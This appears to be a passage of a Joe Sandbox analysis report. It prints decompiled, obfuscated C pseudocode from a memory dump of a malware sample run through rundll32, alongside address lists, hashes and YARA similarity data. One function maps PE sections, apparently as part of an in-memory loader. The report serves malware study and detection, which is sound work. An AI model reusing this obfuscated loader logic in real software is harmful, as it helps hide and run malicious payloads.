				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E007A0DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E007B0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E00797FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E00793DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E007AAC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                          0x007adee3
                                                                                                                          0x007adeea
                                                                                                                          0x007adef1
                                                                                                                          0x007adef3
                                                                                                                          0x007adef4
                                                                                                                          0x007adefb
                                                                                                                          0x007adf02
                                                                                                                          0x007adf03
                                                                                                                          0x007adf04
                                                                                                                          0x007adf09
                                                                                                                          0x007adf11
                                                                                                                          0x007adf14
                                                                                                                          0x007adf1b
                                                                                                                          0x007adf23
                                                                                                                          0x007adf28
                                                                                                                          0x007adf30
                                                                                                                          0x007adf38
                                                                                                                          0x007adf40
                                                                                                                          0x007adf48
                                                                                                                          0x007adf50
                                                                                                                          0x007adf58
                                                                                                                          0x007adf60
                                                                                                                          0x007adf68
                                                                                                                          0x007adf70
                                                                                                                          0x007adf78
                                                                                                                          0x007adf80
                                                                                                                          0x007adf85
                                                                                                                          0x007adf8a
                                                                                                                          0x007adf92
                                                                                                                          0x007adf9a
                                                                                                                          0x007adfa6
                                                                                                                          0x007adfa9
                                                                                                                          0x007adfad
                                                                                                                          0x007adfb5
                                                                                                                          0x007adfbd
                                                                                                                          0x007adfc5
                                                                                                                          0x007adfcd
                                                                                                                          0x007adfd5
                                                                                                                          0x007adfdd
                                                                                                                          0x007adfe5
                                                                                                                          0x007adfed
                                                                                                                          0x007adffa
                                                                                                                          0x007adffe
                                                                                                                          0x007ae006
                                                                                                                          0x007ae00e
                                                                                                                          0x007ae016
                                                                                                                          0x007ae01e
                                                                                                                          0x007ae026
                                                                                                                          0x007ae02e
                                                                                                                          0x007ae036
                                                                                                                          0x007ae044
                                                                                                                          0x007ae045
                                                                                                                          0x007ae049
                                                                                                                          0x007ae051
                                                                                                                          0x007ae059
                                                                                                                          0x007ae061
                                                                                                                          0x007ae069
                                                                                                                          0x007ae071
                                                                                                                          0x007ae079
                                                                                                                          0x007ae081
                                                                                                                          0x007ae089
                                                                                                                          0x007ae099
                                                                                                                          0x007ae0a1
                                                                                                                          0x007ae0ae
                                                                                                                          0x007ae0b2
                                                                                                                          0x007ae0cc
                                                                                                                          0x007ae0d0
                                                                                                                          0x007ae0d8
                                                                                                                          0x007ae0d8
                                                                                                                          0x007ae0e6
                                                                                                                          0x007ae176
                                                                                                                          0x007ae17b
                                                                                                                          0x007ae17e
                                                                                                                          0x00000000
                                                                                                                          0x007ae0e8
                                                                                                                          0x007ae0ee
                                                                                                                          0x007ae153
                                                                                                                          0x007ae155
                                                                                                                          0x007ae158
                                                                                                                          0x00000000
                                                                                                                          0x007ae0f0
                                                                                                                          0x007ae0f6
                                                                                                                          0x007ae1bd
                                                                                                                          0x007ae0fc
                                                                                                                          0x007ae102
                                                                                                                          0x007ae13c
                                                                                                                          0x007ae13d
                                                                                                                          0x007ae13e
                                                                                                                          0x007ae143
                                                                                                                          0x007ae147
                                                                                                                          0x007ae149
                                                                                                                          0x007ae14b
                                                                                                                          0x00000000
                                                                                                                          0x007ae14b
                                                                                                                          0x007ae104
                                                                                                                          0x007ae106
                                                                                                                          0x00000000
                                                                                                                          0x007ae10c
                                                                                                                          0x007ae11e
                                                                                                                          0x007ae123
                                                                                                                          0x007ae126
                                                                                                                          0x00000000
                                                                                                                          0x007ae126
                                                                                                                          0x007ae106
                                                                                                                          0x007ae102
                                                                                                                          0x007ae0f6
                                                                                                                          0x007ae0ee
                                                                                                                          0x007ae1c5
                                                                                                                          0x007ae1c7
                                                                                                                          0x007ae1cc
                                                                                                                          0x007ae1cc
                                                                                                                          0x007ae1d3
                                                                                                                          0x007ae1d3
                                                                                                                          0x007ae18f
                                                                                                                          0x007ae192
                                                                                                                          0x007ae197
                                                                                                                          0x007ae197
                                                                                                                          0x007ae197
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d<$g$Wp
                                                                                                                          • API String ID: 0-355099142
                                                                                                                          • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                          • Instruction ID: c50d4b322ccda987b8e261a65c923a9912b9c8fa0ddd9869bea21f391742c73c
                                                                                                                          • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                          • Instruction Fuzzy Hash: 7C7132B11093419FD768CF61C48942BBBF1FBC9748F508A1DF29A96220D37A9A49CF47
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AC3A0 Relevance: 3.9, Strings: 3, Instructions: 150COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007AC3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E0079474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E0079A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E0079ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E0079ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}


































                                                                                                                          0x007ac3a5
                                                                                                                          0x007ac3a9
                                                                                                                          0x007ac3ab
                                                                                                                          0x007ac3ad
                                                                                                                          0x007ac3b1
                                                                                                                          0x007ac3b5
                                                                                                                          0x007ac3b6
                                                                                                                          0x007ac3b7
                                                                                                                          0x007ac3bc
                                                                                                                          0x007ac3c3
                                                                                                                          0x007ac3cb
                                                                                                                          0x007ac3d3
                                                                                                                          0x007ac3db
                                                                                                                          0x007ac3e6
                                                                                                                          0x007ac3eb
                                                                                                                          0x007ac3f1
                                                                                                                          0x007ac3f9
                                                                                                                          0x007ac401
                                                                                                                          0x007ac409
                                                                                                                          0x007ac416
                                                                                                                          0x007ac419
                                                                                                                          0x007ac41d
                                                                                                                          0x007ac425
                                                                                                                          0x007ac42d
                                                                                                                          0x007ac435
                                                                                                                          0x007ac43d
                                                                                                                          0x007ac445
                                                                                                                          0x007ac44d
                                                                                                                          0x007ac455
                                                                                                                          0x007ac45d
                                                                                                                          0x007ac465
                                                                                                                          0x007ac46d
                                                                                                                          0x007ac472
                                                                                                                          0x007ac47a
                                                                                                                          0x007ac482
                                                                                                                          0x007ac48a
                                                                                                                          0x007ac48f
                                                                                                                          0x007ac497
                                                                                                                          0x007ac49f
                                                                                                                          0x007ac4a7
                                                                                                                          0x007ac4af
                                                                                                                          0x007ac4b7
                                                                                                                          0x007ac4c7
                                                                                                                          0x007ac4cb
                                                                                                                          0x007ac4d4
                                                                                                                          0x007ac4d9
                                                                                                                          0x007ac4df
                                                                                                                          0x007ac4e7
                                                                                                                          0x007ac4ef
                                                                                                                          0x007ac4f7
                                                                                                                          0x007ac4ff
                                                                                                                          0x007ac507
                                                                                                                          0x007ac50f
                                                                                                                          0x007ac518
                                                                                                                          0x007ac51b
                                                                                                                          0x007ac51f
                                                                                                                          0x007ac527
                                                                                                                          0x007ac52f
                                                                                                                          0x007ac537
                                                                                                                          0x007ac53f
                                                                                                                          0x007ac54c
                                                                                                                          0x007ac550
                                                                                                                          0x007ac55a
                                                                                                                          0x007ac562
                                                                                                                          0x007ac56a
                                                                                                                          0x007ac572
                                                                                                                          0x007ac57a
                                                                                                                          0x007ac58a
                                                                                                                          0x007ac58e
                                                                                                                          0x007ac593
                                                                                                                          0x007ac595
                                                                                                                          0x007ac59a
                                                                                                                          0x007ac5a9
                                                                                                                          0x007ac5c3
                                                                                                                          0x007ac5c5
                                                                                                                          0x007ac5ca
                                                                                                                          0x007ac628
                                                                                                                          0x00000000
                                                                                                                          0x007ac62a
                                                                                                                          0x007ac5dd
                                                                                                                          0x007ac5e6
                                                                                                                          0x007ac5f0
                                                                                                                          0x007ac5f5
                                                                                                                          0x007ac623
                                                                                                                          0x007ac60a
                                                                                                                          0x007ac618
                                                                                                                          0x007ac61d
                                                                                                                          0x007ac620
                                                                                                                          0x007ac620
                                                                                                                          0x00000000
                                                                                                                          0x007ac627
                                                                                                                          0x007ac630

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: P;8$V"$`y
                                                                                                                          • API String ID: 0-4109183828
                                                                                                                          • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                          • Instruction ID: aab895f362780554ced0cd1d97dc73bcf7c900437248c8a0b5bb22e55c5c426b
                                                                                                                          • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                          • Instruction Fuzzy Hash: 6C6145B1518340AFC354CF66C88991BBBF1FBC9718F108A1CF69A96260D7B6D919CF06
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00791A56 Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00791A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E007AD97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E00793DBC( &_v44, _t101, _v72, _v48, _v76);
							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E00792A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}






















                                                                                                                          0x00791a5d
                                                                                                                          0x00791a61
                                                                                                                          0x00791a63
                                                                                                                          0x00791a65
                                                                                                                          0x00791a69
                                                                                                                          0x00791a6a
                                                                                                                          0x00791a6b
                                                                                                                          0x00791a70
                                                                                                                          0x00791a78
                                                                                                                          0x00791a7b
                                                                                                                          0x00791a85
                                                                                                                          0x00791a8d
                                                                                                                          0x00791a8f
                                                                                                                          0x00791a97
                                                                                                                          0x00791a9c
                                                                                                                          0x00791aa4
                                                                                                                          0x00791aac
                                                                                                                          0x00791ab4
                                                                                                                          0x00791abc
                                                                                                                          0x00791ac4
                                                                                                                          0x00791ad3
                                                                                                                          0x00791ad4
                                                                                                                          0x00791ad8
                                                                                                                          0x00791ae0
                                                                                                                          0x00791ae8
                                                                                                                          0x00791af5
                                                                                                                          0x00791af9
                                                                                                                          0x00791b01
                                                                                                                          0x00791b06
                                                                                                                          0x00791b0e
                                                                                                                          0x00791b16
                                                                                                                          0x00791b1e
                                                                                                                          0x00791b26
                                                                                                                          0x00791b2e
                                                                                                                          0x00791b38
                                                                                                                          0x00791b3c
                                                                                                                          0x00791b44
                                                                                                                          0x00791b4c
                                                                                                                          0x00791b51
                                                                                                                          0x00791b59
                                                                                                                          0x00791b61
                                                                                                                          0x00791b69
                                                                                                                          0x00791b6e
                                                                                                                          0x00791b72
                                                                                                                          0x00791b7d
                                                                                                                          0x00791b81
                                                                                                                          0x00791b89
                                                                                                                          0x00791b91
                                                                                                                          0x00791b96
                                                                                                                          0x00791b9e
                                                                                                                          0x00791ba6
                                                                                                                          0x00791bb0
                                                                                                                          0x00791c36
                                                                                                                          0x00791c38
                                                                                                                          0x00791bb2
                                                                                                                          0x00791bb8
                                                                                                                          0x00791bf9
                                                                                                                          0x00791bfe
                                                                                                                          0x00791c01
                                                                                                                          0x00000000
                                                                                                                          0x00791bba
                                                                                                                          0x00791bc0
                                                                                                                          0x00791c0d
                                                                                                                          0x00791c0d
                                                                                                                          0x00791c13
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00791c15
                                                                                                                          0x00791bc2
                                                                                                                          0x00791bd7
                                                                                                                          0x00791bdc
                                                                                                                          0x00791be1
                                                                                                                          0x00791be3
                                                                                                                          0x00000000
                                                                                                                          0x00791be3
                                                                                                                          0x00791be1
                                                                                                                          0x00791bc0
                                                                                                                          0x00791bb8
                                                                                                                          0x00791c44
                                                                                                                          0x00791c44
                                                                                                                          0x00791c08
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %#O$DAZ$DAZ
                                                                                                                          • API String ID: 0-2081751441
                                                                                                                          • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                          • Instruction ID: caa7d384ce13e4dd9b00faa46e8fe79919a69abd5156b7ddea6173e2910c44a3
                                                                                                                          • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                          • Instruction Fuzzy Hash: 305147725083029FCB59CF25D98981FBBE1FBD8758F900A1DF586A2220D375CA198F97
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007B0C14 Relevance: 3.9, Strings: 3, Instructions: 113COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007B0C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E007AC2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E007AC2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E0079474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}





















                                                                                                                          0x007b0c14
                                                                                                                          0x007b0c1b
                                                                                                                          0x007b0c1d
                                                                                                                          0x007b0c27
                                                                                                                          0x007b0c2f
                                                                                                                          0x007b0c34
                                                                                                                          0x007b0c3c
                                                                                                                          0x007b0c44
                                                                                                                          0x007b0c49
                                                                                                                          0x007b0c51
                                                                                                                          0x007b0c56
                                                                                                                          0x007b0c5e
                                                                                                                          0x007b0c66
                                                                                                                          0x007b0c6e
                                                                                                                          0x007b0c76
                                                                                                                          0x007b0c7e
                                                                                                                          0x007b0c86
                                                                                                                          0x007b0c8e
                                                                                                                          0x007b0c96
                                                                                                                          0x007b0c9e
                                                                                                                          0x007b0ca6
                                                                                                                          0x007b0cab
                                                                                                                          0x007b0cb8
                                                                                                                          0x007b0cbc
                                                                                                                          0x007b0cc4
                                                                                                                          0x007b0cc6
                                                                                                                          0x007b0cce
                                                                                                                          0x007b0cd3
                                                                                                                          0x007b0ce7
                                                                                                                          0x007b0ce8
                                                                                                                          0x007b0cec
                                                                                                                          0x007b0cf4
                                                                                                                          0x007b0cfc
                                                                                                                          0x007b0d04
                                                                                                                          0x007b0d12
                                                                                                                          0x007b0d16
                                                                                                                          0x007b0d1e
                                                                                                                          0x007b0d26
                                                                                                                          0x007b0d2e
                                                                                                                          0x007b0d3b
                                                                                                                          0x007b0d3f
                                                                                                                          0x007b0d47
                                                                                                                          0x007b0d4f
                                                                                                                          0x007b0d57
                                                                                                                          0x007b0d5f
                                                                                                                          0x007b0d67
                                                                                                                          0x007b0d6f
                                                                                                                          0x007b0d77
                                                                                                                          0x007b0d7f
                                                                                                                          0x007b0d87
                                                                                                                          0x007b0d94
                                                                                                                          0x007b0d98
                                                                                                                          0x007b0da0
                                                                                                                          0x007b0da8
                                                                                                                          0x007b0da8
                                                                                                                          0x007b0db6
                                                                                                                          0x007b0e2e
                                                                                                                          0x007b0db8
                                                                                                                          0x007b0dbe
                                                                                                                          0x007b0df2
                                                                                                                          0x007b0df6
                                                                                                                          0x007b0dfb
                                                                                                                          0x007b0dfe
                                                                                                                          0x007b0e03
                                                                                                                          0x00000000
                                                                                                                          0x007b0dc0
                                                                                                                          0x007b0dc2
                                                                                                                          0x00000000
                                                                                                                          0x007b0dc4
                                                                                                                          0x007b0dd0
                                                                                                                          0x007b0dd1
                                                                                                                          0x007b0dd2
                                                                                                                          0x007b0dd7
                                                                                                                          0x007b0dda
                                                                                                                          0x007b0ddf
                                                                                                                          0x00000000
                                                                                                                          0x007b0ddf
                                                                                                                          0x007b0dc2
                                                                                                                          0x007b0dbe
                                                                                                                          0x007b0e30
                                                                                                                          0x007b0e39
                                                                                                                          0x007b0e39
                                                                                                                          0x007b0e07
                                                                                                                          0x007b0e09
                                                                                                                          0x007b0e09
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 9^xu$fj$im
                                                                                                                          • API String ID: 0-3261451082
                                                                                                                          • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                          • Instruction ID: dba0febb2ce73170a93a27d43b4a50801f7a6e52067c051ce4ea2ee7bd47d8d0
                                                                                                                          • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                          • Instruction Fuzzy Hash: 835156B25083429BC784CF25D48944BBBE0BFD8368F501A1DF495A6260D3B4CA59CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A6C49 Relevance: 3.9, Strings: 3, Instructions: 104COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
